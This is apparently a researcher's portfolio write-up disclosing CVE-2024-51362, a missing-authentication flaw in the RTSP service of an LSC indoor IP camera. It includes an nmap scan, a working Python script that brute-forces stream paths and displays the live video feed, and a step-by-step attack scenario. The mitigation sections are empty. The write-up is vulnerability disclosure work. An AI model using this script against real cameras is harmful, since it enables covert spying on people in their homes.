Back to Portfolio

CVE-2024-51362 - LSC Smart Connect Indoor IP Camera

Category: Security Research
Severity: High
CVE ID: CVE-2024-51362
Date: May 11, 2024
Vulnerability Summary:
Vulnerability research revealing unauthorized access to live camera footage in LSC Smart Connect Indoor IP Camera through improper access control in RTSP protocol implementation.
Product: LSC Smart Connect Indoor IP Camera
Version: V7.6.32
Type: Incorrect Access Control (CWE-284)
Component: RTSP Protocol, Port 8554 and 80
Impact: Unauthorized access to live video feed
CVSS Score: High (Network accessible without authentication)

$ nmap -sV -sC target

Starting with a comprehensive port scan of the camera to identify available services:

nmap -p- -sV -sC -T4 172.20.10.2
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-23 17:55 CEST
Nmap scan report for 172.20.10.2
Host is up (0.033s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT     STATE SERVICE    VERSION
80/tcp   open  rtsp       DoorBird video doorbell rtspd
|_rtsp-methods: OPTIONS, DESCRIBE, SETUP, TEARDOWN, PLAY, PAUSE, GET_PARAMETER, SET_PARAMETER
|_http-title: Site doesn't have a title.
|_http-cors: GET POST OPTIONS
835/tcp  open  tcpwrapped
6668/tcp open  irc?
|_irc-info: Unable to open connection
8554/tcp open  rtsp       DoorBird video doorbell rtspd
|_rtsp-methods: OPTIONS, DESCRIBE, SETUP, TEARDOWN, PLAY, PAUSE, GET_PARAMETER, SET_PARAMETER
Service Info: Device: webcam

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 922.12 seconds

Open Ports Summary:

$ analyzing RTSP vulnerabilities

The scan reveals two RTSP (Real Time Streaming Protocol) ports - 80 and 8554. Port 8554 is the standard RTSP port, commonly used for streaming video content. This presents an interesting attack surface.

Initial Observations:

$ exploit development

Since RTSP streams can be accessed using media players like VLC, the next step was to develop a Python script to systematically test for accessible video streams without authentication. The approach involves:

import cv2
import argparse
import socket
import time

def bruteforce(ip_address: str, port: int, file: str) -> None:
    rtsp_ip = f"{ip_address}:{port}"

    try:
        print("Attempting to connect...")
        socket.create_connection((ip_address, port), timeout=5)
        print("Connection successful!")
    except socket.timeout:
        for remaining_time in range(5, 0, -1):
            print(f"Time out in {remaining_time}")
            time.sleep(1)
        print("Timed out")
        exit()

    with open(file, 'r') as directories:
        for directory in directories:
            directory = directory.strip()
            cap = cv2.VideoCapture(f"rtsp://{rtsp_ip}+{directory}")

            if cap.isOpened():
                print(f"Connection successful with directory: {directory}")
                break
            print(f"Connection failed with directory: {directory}")
            continue

    while True:
        ret, frame = cap.read()
        if not ret:
            print("Cannot capture frame.")
            break

        cv2.imshow("RTSP Stream", frame)

        if cv2.waitKey(1) & 0xFF == ord('q'):
            break

    cap.release()
    cv2.destroyAllWindows()
    

def main():
    parser = argparse.ArgumentParser(description="Real Time Streaming Protocol (RTSP) Bruteforce directory script")
    parser.add_argument("-ip", "--ip_address", type=str, required=True, help="the IP address")
    parser.add_argument("-p", "--port", type=int, required=True, help="the port")
    parser.add_argument("-f", "--file", type=str, required=True, help="path to rtsp directory list")
    args = parser.parse_args()

    bruteforce(args.ip_address, args.port, args.file)

if __name__ == "__main__":
    main()

$ python3 exploit.py -ip 172.20.10.2 -p 8554 -f rtsp_dirs.txt

Executing the exploit script against the target camera:

Exploitation Result:
The script successfully established an unauthorized connection to the RTSP stream without requiring any authentication credentials. The video feed became immediately accessible.
RTSP Exploit Result showing unauthorized camera access

*Screenshot was updated later, so don't mind the date

$ impact_assessment

Security Impact:

Attack Scenario:

  1. Attacker gains network access (same network segment)
  2. Port scan reveals RTSP services on ports 80 and 8554
  3. Direct connection to RTSP stream without credentials
  4. Real-time video feed access achieved
  5. Continuous surveillance possible

$ vulnerability_details

Technical Details:
Vulnerability Type: Incorrect Access Control (CWE-284)
Root Cause: Missing authentication mechanism in RTSP implementation
Affected Component: RTSP Protocol handler on port 8554
Authentication Mechanism: None implemented
Network Requirements: Layer 3 connectivity to target device

$ recommendations

Immediate Mitigation:

Long-term Solutions:

Disclosure Information:
This vulnerability demonstrates the critical importance of implementing proper access controls in IoT devices. The LSC Smart Connect Indoor IP Camera's RTSP implementation lacks basic authentication mechanisms, allowing unauthorized users to access live video feeds from any device on the same network segment.